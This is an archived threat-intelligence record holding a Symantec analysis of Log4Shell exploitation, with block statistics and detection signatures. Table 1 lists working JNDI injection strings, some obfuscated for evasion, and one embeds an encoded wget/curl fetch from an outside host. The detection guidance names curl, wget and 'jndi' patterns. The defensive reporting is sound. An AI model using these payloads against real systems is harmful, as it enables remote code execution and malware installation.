{
	"id": "8c5569c5-a0e0-4977-ae3b-daca00aea372",
	"created_at": "2026-04-06T00:08:29.408145Z",
	"updated_at": "2026-04-10T03:23:52.302157Z",
	"deleted_at": null,
	"sha1_hash": "13782a82dbbdf8808a408cb2cacee077d459a56d",
	"title": "Log4j Vulnerabilities: Attack Insights",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 50843,
	"plain_text": "Log4j Vulnerabilities: Attack Insights\r\nBy About the Author\r\nArchived: 2026-04-05 23:11:00 UTC\r\nApache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and\r\nperformance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache\r\nLogging Services, a project of the Apache Software Foundation.\r\nLog4j has been making headlines recently after the public disclosure of three critical vulnerabilities in the utility which can\r\nlead to remote code execution (CVE-2021-44228 and CVE-2021-45046) and denial of service (CVE-2021-45105). The\r\ninitial remote code execution vulnerability (CVE-2021-44228) has been dubbed Log4Shell and has dominated cyber-security news ever since it was publicly disclosed on December 9. The vulnerability has been exploited to deploy a plethora\r\nof payloads like coin miners, Dridex malware, and even ransomware such as Conti.\r\nVariations in attacks\r\nSymantec, a division of Broadcom Software, has observed numerous variations in attack requests primarily aimed at\r\nevading detection. Some sample attack requests can be seen in Table 1.\r\nTable 1. Sample of Log4j vulnerability attack re\r\nAttack requests\r\n${jndi:ldap://:1389/Exploit}\r\n${jndi:dns://MASKED_IP.1/securityscan-http8085}\r\n${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-\r\nl}dap${env:NaN:-:}//MASKED_IP:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMjA5LjE0MS40Ni4xMTQvcmVhZGVyOyBjdXJsIC\r\n${${lower:${lower:jndi}}:${lower:rmi}://MASKED_IP:1389/Binary}\r\n${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://MASKED_IP:1389/Binary}\r\n${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}MASKED_IP:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\nAttackers are predominantly using the LDAP and RMI protocols to download malicious payloads. We have also recorded\r\nvulnerability scans using protocols such as IIOP, DNS, HTTP, NIS etc.\r\nPayloads\r\nMuhstik Botnet - We have observed attackers downloading malicious Java class files as a part of Log4shell exploitation.\r\nThe malicious class file downloads a shell file with the content shown in Figure 1.\r\nFigure 1. Content of shell file downloaded by malicious class file\r\nFigure 1. Content of shell file downloaded by malicious class file\r\nThe shell script attempts to download Executable and Linkable Format (ELF) files and execute them, which leads to the\r\ninstallation of the Muhstik botnet.\r\nXMRig miner - We have also observed attackers installing the XMRig cryptocurrency miner as a part of post-exploitation\r\nactivity related to Log4shell exploitation. The miner is downloaded via a simple PowerShell command (Figure 2).\r\nFigure 2. PowerShell command used to download XMRig miner\r\nFigure 2. PowerShell command used to download XMRig miner\r\nThe miner is executed with the command shown in Figure 3.\r\nFigure 3. Command used to execute XMRig miner\r\nFigure 3. Command used to execute XMRig miner\r\nMalicious class file backdoor - We have also seen attacks attempt to download a malicious Java class file that acts as a\r\nbackdoor. The class file has code to listen for and execute commands from the attacker (Figure 4).\r\nFigure 4. Code used to listen for and execute commands from attacker\r\nFigure 4. Code used to listen for and execute commands from attacker\r\nReverse Bash shell – Attackers were also observed deploying reverse shells on vulnerable machines (Figure 5).\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks\r\nPage 1 of 3\n\nFigure 5. Code used to deploy reverse shell on vulnerable machines\r\nFigure 5. Code used to deploy reverse shell on vulnerable machines\r\nOther publicly reported payloads include the Khonsari and Conti ransomware threats, the Orcus remote access Trojan\r\n(RAT), and the Dridex malware, among others.\r\nSymantec IPS data\r\nFor the period between December 9 (when the first Log4j vulnerability was disclosed) and December 21, Symantec’s\r\nIntrusion Prevention System (IPS) blocked more than 93 million Log4Shell related exploitation attempts on more than\r\n270,000 unique machines.\r\nFigure 6. Blocked Log4Shell related exploitation attempts against unique machines\r\nFigure 6. Blocked Log4Shell related exploitation attempts against unique machines\r\nDuring the same time frame, IPS blocked more than 18 million Log4Shell related exploitation attempts on more than 60,000\r\nunique server machines.\r\nFigure 7. Blocked Log4Shell related exploitation attempts against servers\r\nFigure 7. Blocked Log4Shell related exploitation attempts against servers\r\nThe majority of Log4Shell attacks blocked by Symantec were against machines located in the U.S. and the United Kingdom,\r\nfollowed by Singapore, India, and Australia.\r\nFigure 8. The majority of Log4Shell attacks blocked by Symantec were against machines located in the\r\nU.S. and United Kingdom\r\nFigure 8. The majority of Log4Shell attacks blocked by Symantec were against machines located in the U.S.\r\nand United Kingdom\r\nMeanwhile, the majority of attacks exploiting the Log4j vulnerabilities seem to originate from devices located in the U.S.\r\nand Germany, followed by Russia, the United Kingdom, and China.\r\nFigure 9. The majority of attackers exploiting the Log4j vulnerabilities are located in the U.S. and Germany\r\nFigure 9. The majority of attackers exploiting the Log4j vulnerabilities are located in the U.S. and Germany\r\nProtection\r\nBehavior-based\r\nSONAR.Maljava!g7\r\nSONAR.Ransomware!g1\r\nSONAR.Ransomware!g31\r\nSONAR.Ransomware!g32\r\nSONAR.SuspLaunch!g184\r\nSONAR.SuspLaunch!g185\r\nFile-based\r\nCL.Suspexec!gen106\r\nCL.Suspexec!gen107\r\nCL.Suspexec!gen108\r\nLinux.Kaiten\r\nMiner.XMRig!gen2\r\nRansom.Khonsari\r\nRansom.Tellyouthepass\r\nRansom.Tellyouthepa!g1\r\nRansom.Tellyouthepa!g2\r\nTrojan Horse\r\nTrojan.Maljava\r\nMachine learning-based\r\nHeur.AdvML.C\r\nNetwork-based\r\nAudit: Suspicious Java Class File Executing Arbitrary Commands\r\nAudit: Log4j2 RCE CVE-2021-44228\r\nAudit: Malicious LDAP Response\r\nAttack: Log4j2 RCE CVE-2021-44228 2\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks\r\nPage 2 of 3\n\nAttack: Malicious LDAP Response\r\nAttack: Log4j2 RCE CVE-2021-44228\r\nAttack: Log4j CVE-2021-45046\r\nAttack: Log4j CVE-2021-45105\r\nWeb Attack: Malicious Java Payload Download 2\r\nWeb Attack: Malicious Java Payload Download 3\r\nWeb Attack: Malicious Java Payload Download 4\r\nPolicy-based\r\nDCS provides multi-layered protection for Windows, Linux Server workloads, and container applications for this\r\nvulnerability:\r\nSuspicious Process Execution: Prevention policies prevent malware from being dropped or executed on the system.\r\nDCS hardened Linux servers prevent execution of malware from temp or other writable locations, a technique used\r\nby attackers to drop crypto miners such as XMRig in reported Log4shell exploitation.\r\nReview the Linux proxy execution list for your Log4j-based application sandbox to include additional tools such as\r\n*/curl, */wget. These tools are used by attackers to connect from the victim Log4j application to external command-and-control servers for downloading additional payloads.\r\nDCS sandboxing of Windows and Linux applications prevent suspicious program execution using living-off-the-land\r\ntools and tampering of critical system services and resources.\r\nNetwork Control: Ability to block outgoing connections to public internet and limit required LDAP, HTTP, and other\r\ntraffic from server workloads and containerized applications using Log4j2 to internal trusted systems.\r\nDetection Policies: System Attack detection: Baseline_WebAttackDetection_Generic_MaliciousUserAgent rule\r\nshould be updated to include *jndi:* select string to alert on malicious server requests using the suspicious jndi\r\nlookup attempts via jndi:ldap, jndi:rmi, jndi:dns etc. Make sure to set the path to your web server access log file in\r\nthe IDS Web Attack Detection option. Similar custom text log rules should be added for each of your Log4j\r\napplication log files.\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks"
	],
	"report_names": [
		"log4j-vulnerabilities-attacks"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434109,
	"ts_updated_at": 1775791432,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/13782a82dbbdf8808a408cb2cacee077d459a56d.pdf",
		"text": "https://archive.orkl.eu/13782a82dbbdf8808a408cb2cacee077d459a56d.txt",
		"img": "https://archive.orkl.eu/13782a82dbbdf8808a408cb2cacee077d459a56d.jpg"
	}
}